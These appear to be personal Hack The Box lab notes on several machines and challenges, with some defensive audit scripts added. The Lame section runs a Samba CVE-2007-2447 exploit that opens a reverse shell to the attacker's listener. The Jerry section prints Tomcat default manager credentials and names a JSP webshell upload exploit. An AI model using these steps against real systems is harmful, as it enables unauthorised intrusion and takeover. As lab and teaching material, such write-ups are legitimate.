OS="Linux"
DIFFICULTY="Easy"
IP="10.10.10.3"

## == nmap scan
> nmap -sV -sC -vv 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3

## == probe anonymous ftp login
> ncftp -u anonymous 10.10.10.3
...
Login successful.
## --> sadly no items found


## == check samba shares
# lists public shares on a server
> smbclient -L 10.10.10.3 -U%

# show a tree diagram of all the shares
> smbtree -b -N

# full smb enumeration
> enum4linux -a 10.10.10.3

# show details like permissions
> smbmap -H 10.10.10.3
## --> we get rw access on "/tmp"

# connect with user "anonymous" to "/tmp" share
> smbclient -N //10.10.10.3/tmp
## --> looking around but no cool stuff in there


## == checking for CVEs
# nmap says
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.3.4
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian

# using searchsploit
> searchsploit vsftpd 2.3.4
> searchsploit Openssh 4.7p1
> searchsploit Samba 3.0
## --> got a lot of CVEs

# vsftpd
> searchsploit -m unix/remote/49757.py

## == small insert
## shorten the route with:
## "https://github.com/amriunix/CVE-2007-2447"
## usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
## after running this script we got root :)
> nc -lnvp 555
> python ./usermap_script.py 10.10.10.3 139 10.10.14.14 555
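Defender-side check added here (not part of the original notes): a small Python audit over an smb.conf that flags the guest-writable share and the "username map script" option the steps above depend on. The smb.conf text is constructed for the demo and the script path is a placeholder.

```python
# Added example, not from the original notes: audit an smb.conf for what this box
# relies on - a guest-accessible writable share like "tmp", and the "username map
# script" option that CVE-2007-2447 abuses on Samba 3.0.x before 3.0.25.
import re

# Constructed sample config; the script path is a placeholder, not a real file.
SAMPLE_SMB_CONF = """\
[global]
   security = user
   username map script = /etc/samba/scripts/PLACEHOLDER.sh

[tmp]
   path = /tmp
   read only = no
   guest ok = yes
"""

def parse_smb_conf(text):
    """INI-style parse to {section: {option: value}} with Samba-normalised option names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":          # blank or comment line
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:                                    # new [section]
            current = m.group(1).strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_smb_conf(text)
    findings = []
    if "username map script" in conf.get("global", {}):
        findings.append("global: 'username map script' is set (the CVE-2007-2447 option)")
    for share, opts in conf.items():
        if share == "global":
            continue
        # Samba defaults: read only = yes, guest ok = no; 'writable' inverts 'read only'
        writable = is_yes(opts.get("writable", "no")) or not is_yes(opts.get("read only", "yes"))
        if is_yes(opts.get("guest ok", "no")) and writable:
            findings.append(f"share [{share}]: guest-accessible AND writable")
    return findings
```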

CHALLENGE="file"
FILETYPE="exe"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox Find\ The\ Easy\ Pass.zip

## inspect the exe
> file EasyPass.exe
EasyPass.exe: PE32 executable (GUI) Intel 80386, for MS Windows

## get a lot more info
> rabin2 -I EasyPass.exe
arch     x86
baddr    0x400000
binsz    402432
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x00063785
compiled Sat Jun 20 00:22:17 1992
crypto   false
endian   little
havecode true
...

## deeper inspection with "objdump"
> objdump -s EasyPass.exe
## --> got a lot of info, let's play around a little
> objdump -s EasyPass.exe | grep -i 'pass\|valid\|return\|wrong\|0x'
 40d970 c3000000 ffffffff 02000000 30780000  ............0x..
 428d10 38584500 e48a4200 30584500 dc8a4200  8XE...B.0XE...B.
 42ad00 00000028 000c5061 7373776f 72644368  ...(..PasswordCh
 454200 57726f6e 67205061 7373776f 72642100  Wrong Password!.
 45e5d0 68306c30 70307430 78307c30 80308430  h0l0p0t0x0|0.0.0
 460860 50305430 58307030 90309830 9c30a030  P0T0X0p0.0.0.0.0
 462a60 25303f30 43304730 4c305830 5c308630  %0?0C0G0L0X0\0.0
 462ef0 48304c30 50305430 58305c30 60306430  H0L0P0T0X0\0`0d0
 462f00 68306c30 70307430 78307c30 80308430  h0l0p0t0x0|0.0.0
 4682b0 65722050 61737377 6f726400 00055445  er Password...TE
 468330 65636b20 50617373 776f7264 08546162  eck Password.Tab
## --> does the string "Wrong Password" bring us onto the right path?
 454200 57726f6e 67205061 7373776f 72642100  Wrong Password!.

## using rabin2 with the "-z" option for a really nice table view
> rabin2 -z EasyPass.exe | grep -i pass
469 0x000622ad 0x004682ad 14  15   .rsrc   ascii   Enter Password
481 0x0006232e 0x0046832e 23  24   .rsrc   ascii   Check Password\bTabOrder

## using a decompiler to get more info - radare2 is a crazy command-line tool ;)
> radare2 EasyPass.exe
 -- THE ONLY WINNING MOVE IS NOT TO PLAY.
[0x00454450]> aa # analyze the binary
[x] Analyze all flags starting with sym. and entry0 (aa)

[0x00454450]> aaa # analyze the binary a bit more
[Invalid function name 'sub.user32.dll_GetWindowThreadProcessId' at 0x0040699c
Invalid function name 'sub.user32.dll_GetWindow' at 0x00406964
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.

[0x00454450]> aav # analyzing program structure and discovering functions
[x] Finding xrefs in noncode section with anal.in=io.maps
[x] Analyze value pointers (aav)
[x] Value from 0x00454600 to 0x00455000 (aav)
[x] 0x00454600-0x00455000 in 0x454600-0x455000 (aav)
[x] 0x00454600-0x00455000 in 0x401000-0x454600 (aav)
[x] Value from 0x00401000 to 0x00454600 (aav)
[x] 0x00401000-0x00454600 in 0x454600-0x455000 (aav)
[x] 0x00401000-0x00454600 in 0x401000-0x454600 (aav)

[0x00454450]> s entry0 # get on the entry point of the program

[0x00454450]> izz | grep -i pass # search again for the buzzword "pass"
2808 0x0002a105 0x0042ad05 13  14   CODE    ascii   \fPasswordChar
5483 0x00053600 0x00454200 15  16   CODE    ascii   Wrong Password!
7072 0x000622ad 0x004682ad 14  15   .rsrc   ascii   Enter Password
7084 0x0006232e 0x0046832e 23  24   .rsrc   ascii   Check Password\bTabOrder

[0x00454450]> s 0x00454200 # get on the start point "Wrong Password" we found above

[0x00454450]> V # starts the visual mode - "p" and "P" switch the view mode
## --> if we scroll up a bit we find a string printing "Good Job. Congratulations"
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF  comment
0x004541d0  2100 0000 ffff ffff 1900 0000 476f 6f64  !...........Good  ; aav.0x004541d0  ; aav.0x004541dc
0x004541e0  204a 6f62 2e20 436f 6e67 7261 7475 6c61   Job. Congratula
0x004541f0  7469 6f6e 7300 0000 ffff ffff 0f00 0000  tions...........
0x00454200  5772 6f6e 6720 5061 7373 776f 7264 2100  Wrong Password!.  ; aav.0x00454200

## we need to find the reference "0x004541dc" from the comment column
[0x0045412b]> axt 0x4541dc # (A cross(X)-reference To)
(nofunc) 0x454138 [DATA] mov eax, aav.0x004541dc

[0x00454450]> V # enter the visual mode again
## let's change the view to "[xaDvc]" with uppercase "P" and scroll to "0x00454138"
## now we see the called function "call fcn.00427a30"
0x00454138      b8dc414500     mov eax, aav.0x004541dc     ; "Good Job. Congratulations"
0x0045413d      e8ee38fdff     call fcn.00427a30           ;[1]
0x00454142      eb0a           jmp 0x45414e
; CODE XREF from aav.0x00454070 @ +0xc6
0x00454144      b800424500     mov eax, aav.0x00454200     ; "Wrong Password!"
0x00454149      e8e238fdff     call fcn.00427a30           ;[1]

## the function is listed twice - once for the rejected and once for the accepted password
## if we scroll further up we see repeated calls to "fcn.004042b4" > here we have our password :)
0x00454093      ba88414500     mov edx, aav.0x00454188     ; "f"
0x00454098      e81702fbff     call fcn.004042b4           ;[1]
0x0045409d      8d45f4         lea eax, [ebp - 0xc]
0x004540a0      ba94414500     mov edx, aav.0x00454194     ; "o"
0x004540a5      e80a02fbff     call fcn.004042b4           ;[1]
0x004540aa      8d45f0         lea eax, [ebp - 0x10]
0x004540ad      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540b2      e8fd01fbff     call fcn.004042b4           ;[1]
0x004540b7      8d45ec         lea eax, [ebp - 0x14]
0x004540ba      baac414500     mov edx, aav.0x004541ac     ; "t"
0x004540bf      e8f001fbff     call fcn.004042b4           ;[1]
; CODE XREF from aav.0x00454050 @ +0x5
0x004540c4      8d45e8         lea eax, [ebp - 0x18]
0x004540c7      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540cc      e8e301fbff     call fcn.004042b4           ;[1]
0x004540d1      8d45e4         lea eax, [ebp - 0x1c]
0x004540d4      bab8414500     mov edx, aav.0x004541b8     ; "a"
0x004540d9      e8d601fbff     call fcn.004042b4           ;[1]
0x004540de      8d45e0         lea eax, [ebp - 0x20]
0x004540e1      bac4414500     mov edx, aav.0x004541c4     ; "n"
0x004540e6      e8c901fbff     call fcn.004042b4           ;[1]
0x004540eb      8d45dc         lea eax, [ebp - 0x24]
0x004540ee      bad0414500     mov edx, aav.0x004541d0     ; "!"
0x004540f3      e8bc01fbff     call fcn.004042b4           ;[1]
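Added example, not from the original notes: a script that reads the listing above and joins the literals handed to fcn.004042b4 in address order, so the value assembled on the stack can be read off without stepping through it by hand. The listing is copied from the lines above (minus the lea instructions); treating fcn.004042b4 as the string-assignment helper is the assumption the notes already make.

```python
# Added example, not from the original notes: pull the string literals out of
# the radare2 listing above, in address order, but only those handed to the
# assignment helper fcn.004042b4 - that is the value the binary builds on the
# stack before comparing it with the input. LISTING is copied from the notes.
import re

LISTING = """\
0x00454093      ba88414500     mov edx, aav.0x00454188     ; "f"
0x00454098      e81702fbff     call fcn.004042b4           ;[1]
0x004540a0      ba94414500     mov edx, aav.0x00454194     ; "o"
0x004540a5      e80a02fbff     call fcn.004042b4           ;[1]
0x004540ad      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540b2      e8fd01fbff     call fcn.004042b4           ;[1]
0x004540ba      baac414500     mov edx, aav.0x004541ac     ; "t"
0x004540bf      e8f001fbff     call fcn.004042b4           ;[1]
0x004540c7      baa0414500     mov edx, aav.0x004541a0     ; "r"
0x004540cc      e8e301fbff     call fcn.004042b4           ;[1]
0x004540d4      bab8414500     mov edx, aav.0x004541b8     ; "a"
0x004540d9      e8d601fbff     call fcn.004042b4           ;[1]
0x004540e1      bac4414500     mov edx, aav.0x004541c4     ; "n"
0x004540e6      e8c901fbff     call fcn.004042b4           ;[1]
0x004540ee      bad0414500     mov edx, aav.0x004541d0     ; "!"
0x004540f3      e8bc01fbff     call fcn.004042b4           ;[1]
0x00454138      b8dc414500     mov eax, aav.0x004541dc     ; "Good Job. Congratulations"
0x0045413d      e8ee38fdff     call fcn.00427a30           ;[1]
"""

# A 'mov e?x, <ref>  ; "literal"' line, and a 'call fcn.xxx' line.
MOV_LIT = re.compile(r'^(0x[0-9a-f]+)\s+\S+\s+mov e[ad]x, \S+\s+; "(.*)"$')
CALL = re.compile(r'^0x[0-9a-f]+\s+\S+\s+call (fcn\.[0-9a-f]+)')

def recover_literals(listing, helper):
    """(address, literal) for each string loaded into a register and passed to `helper` by the next call."""
    found, pending = [], None
    for line in listing.splitlines():
        m = MOV_LIT.match(line.strip())
        if m:
            pending = (int(m.group(1), 16), m.group(2))
            continue
        c = CALL.match(line.strip())
        if c:
            if pending and c.group(1) == helper:
                found.append(pending)
            pending = None                 # any call consumes the pending literal
    return sorted(found)

def assembled_value(listing, helper="fcn.004042b4"):
    """Concatenate the literals in address order."""
    return "".join(lit for _, lit in recover_literals(listing, helper))
```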

CHALLENGE="file"
FILETYPE="public_key"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox Weak\ RSA.zip

## we've got 2 files
flag.enc
key.pub

## let's see what's in key.pub
> cat key.pub
-----BEGIN PUBLIC KEY-----
MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKBgQMwO3kPsUnaNAbUlaubn7ip
4pNEXjvUOxjvLwUhtybr6Ng4undLtSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy
23CZuOl3WIsLiRKSVYyqBc9d8rxjNMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3
RQP/6p5hv1PYcWmErEeDewKBgGEXxgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpD
qlqqOFD8JA5UFK0roQkOjhLWSVu8c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ
4gYo6Ax+U7q6TOWhQpiBHnC0ojE8kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8sr
lb/N
-----END PUBLIC KEY-----

## okay - good documentation about SSL keys is in the Debian wiki
## see: https://wiki.debian.org/SSLkeys

## let's try "RsaCtfTool" and dump the parameters
> rsactftool --dumpkey --key key.pub
n: 5731778245796309116684692727125478654435566540861901047227955\
0975689167002325903127543350912148103033159856937938350592831549\
5462888788593695945321417676298471525243254143375622365552296949\
4139206792905357171723195620643089373425674836904865928683527630\
21360051776130919666984258847567032959931761686072492923
e: 6818092863128414721282050719260573463203552413113993861806957\
5375591806315288775310503696874509130847529572462608728019290710\
1496613002461380365793420795804347773441112454951879278811321383\
5795874497424336596220483508975398766739551168282939127671435958\
2055290140617797814443530797154040685978229936907206605

## okay, let's try to extract the private key from the public key
> rsactftool --publickey ./key.pub --private
rivate argument is not set, the private key will not be displayed, even if recovered.
[*] Testing key key.pub.
## maybe an error caused by missing dependencies
## I've cloned the git repo and installed the requirements
> pip3 install -r "requirements.txt"
## this caused me trouble
## issue already closed
> pip uninstall PyCrypto
> pip uninstall PyCryptodome
> pip install PyCryptodome
## after another try - no results - maybe a bug...
## I've tried a fork of the tool
> git clone https://github.com/daedalus/RsaCtfTool
> python RsaCtfTool/RsaCtfTool.py  --publickey ./key.pub --private

## bingo :)
Private key :
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

## let's decrypt the file
> openssl rsautl -decrypt -in ./flag.enc -out ./flag.txt -inkey ./key.priv
## woohoo - we've got the flag xD
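Added example, not from the original notes: what a key audit does with an (n, e) pair like the one rsactftool dumped above. An e almost as large as n points at a tiny private exponent, and Wiener's attack (one of the checks RsaCtfTool runs) recovers such a d from the convergents of e/n. The key in the block is constructed at runtime from two well-known primes with a deliberately small d; it is not the challenge key.

```python
# Added example, not from the original notes: audit an RSA public key given as
# (n, e). An e almost as large as n is the classic sign of a small private
# exponent d, and Wiener's attack recovers such a d from the convergents of e/n.
# The key below is constructed from two well-known primes with a tiny d
# (not the challenge key), so the audit has something to flag.
from math import isqrt

def convergents(num, den):
    """Yield (h, k) for each convergent h/k of the continued fraction num/den."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while den:
        a, r = divmod(num, den)
        h0, h1 = h1, a * h1 + h0
        k0, k1 = k1, a * k1 + k0
        yield h1, k1
        num, den = den, r

def wiener_recover_d(n, e):
    """Return d if some convergent k/d of e/n yields a phi that factors n, else None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1                  # p + q, if phi is right
        disc = s * s - 4 * n             # (p - q)^2, if so
        if disc >= 0:
            r = isqrt(disc)
            if r * r == disc and (s + r) % 2 == 0:
                return d
    return None

def audit_rsa_public(n, e):
    """Findings a key audit would raise before the key is ever used."""
    findings = []
    if n.bit_length() < 2048:
        findings.append(f"modulus is only {n.bit_length()} bits")
    if e.bit_length() > n.bit_length() // 2:
        findings.append("public exponent is almost as large as n (usual value is 65537)")
    d = wiener_recover_d(n, e)
    if d is not None:
        findings.append(f"private exponent recovered by Wiener's attack: d={d}")
    return findings

# Constructed weak key: p, q are well-known primes, d = 8191 < n^(1/4) / 3.
P, Q, D = 1000000007, 998244353, 8191
N = P * Q
E = pow(D, -1, (P - 1) * (Q - 1))   # modular inverse, Python 3.8+
```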

OS="Windows"
DIFFICULTY="Easy"
IP="10.10.10.95"

## == nmap scan
> nmap -sV -sC -vv 10.10.10.95
Discovered open port 8080/tcp on 10.10.10.95

## == port 8080 - apache tomcat
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

## check the searchsploit db for CVEs
> searchsploit tomcat 7.0.88

----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | windows/webapps/42953.txt
----------------------------------------------------------------------------- ---------------------------------

## get the python exploit
> searchsploit -m 42966

## check the exploit
./cve-2017-12617.py [options]

options:

-u ,--url [::] check target url if it's vulnerable
-p,--pwn  [::] generate webshell and upload it
-l,--list [::] hosts list

## run the check first
> python 42966.py -u 10.10.10.95:8080
requests.exceptions.InvalidSchema: No connection adapters were found for '10.10.10.95:8080

## get the txt file
> searchsploit -m 42953
> cat 42953
E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
## okay, we need to put the content of this file on the server and pull the request URL
## on the server HTTP PUT has to be enabled
## this has to be done on the admin interface - let's check the interface
> nikto -h 10.10.10.95:8080
...
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
...
## default account
ID: tomcat
PW: s3cret

## let's try to log in to the manager app
> elinks 10.10.10.95:8080/manager/html

## bingo :)
   Tomcat Web Application Manager

   ┌────────────┬───────────┐
   │Message:    │OK         │
   └────────────┴───────────┘
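Added example, not from the original notes: an audit of the two Tomcat config files behind what nikto reported - tomcat-users.xml for the example credentials (tomcat/s3cret) and web.xml for a DefaultServlet with readonly=false, the setting CVE-2017-12617 needs for HTTP PUT to write a JSP. Both XML documents are constructed samples, not real configs.

```python
# Added example, not from the original notes: audit a Tomcat install's
# conf/tomcat-users.xml and conf/web.xml for the two things this box shows -
# manager credentials copied from Tomcat's own docs/examples, and a DefaultServlet
# with readonly=false (the setting CVE-2017-12617 needs). Both samples are constructed.
import xml.etree.ElementTree as ET

TOMCAT_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>
"""

WEB_XML = """\
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>
"""

# Username/password pairs that ship as examples in Tomcat's own files and docs.
EXAMPLE_CREDS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("both", "tomcat"), ("role1", "tomcat")}

def local(tag):
    """Strip the namespace: '{http://...}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]

def child_text(el, name):
    return next((c.text or "" for c in el if local(c.tag) == name), "")

def audit_tomcat_users(xml_text):
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) == "user" and (el.get("username"), el.get("password")) in EXAMPLE_CREDS:
            findings.append(f"user '{el.get('username')}' uses an example password from the Tomcat docs")
    return findings

def audit_default_servlet(xml_text):
    findings = []
    for servlet in ET.fromstring(xml_text).iter():
        if local(servlet.tag) != "servlet" or not child_text(servlet, "servlet-class").endswith("DefaultServlet"):
            continue
        params = {child_text(p, "param-name"): child_text(p, "param-value").strip().lower()
                  for p in servlet.iter() if local(p.tag) == "init-param"}
        if params.get("readonly") == "false":
            findings.append("DefaultServlet readonly=false: PUT/DELETE can write files into the webapp")
    return findings
```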


CHALLENGE="file"
FILETYPE="?"
DIFFICULTY="easy"

## download and extract password protected zip file
> unzip -P hackthebox You\ know\ 0xDiablos.zip
Archive:  You know 0xDiablos.zip
   skipping: vuln                    need PK compat. v5.1 (can do v4.6)
## okay this won't work > next try
> 7z x You\ know\ 0xDiablos.zip -phackthebox
Everything is Ok

## we've got a file called "vuln" - let's check what it is
> cat vuln
ELF484
...
tii        libc.so.6_IO_stdin_usedexitfopenputsprintffgetsstdoutsetresgidgetegidsetvbuf__libc_start_mainGLIBC_2.1GLIBC_2.0__gmon_start__ii
...
[^_]ÍvË,$_[rflag.txtHurry up and try in on server side.You know who are 0xDiablos: P
...
GCC: (Debian 8.3.0-19) 8.3.0
## nice - looks like unformatted C code or something that can be compiled with GCC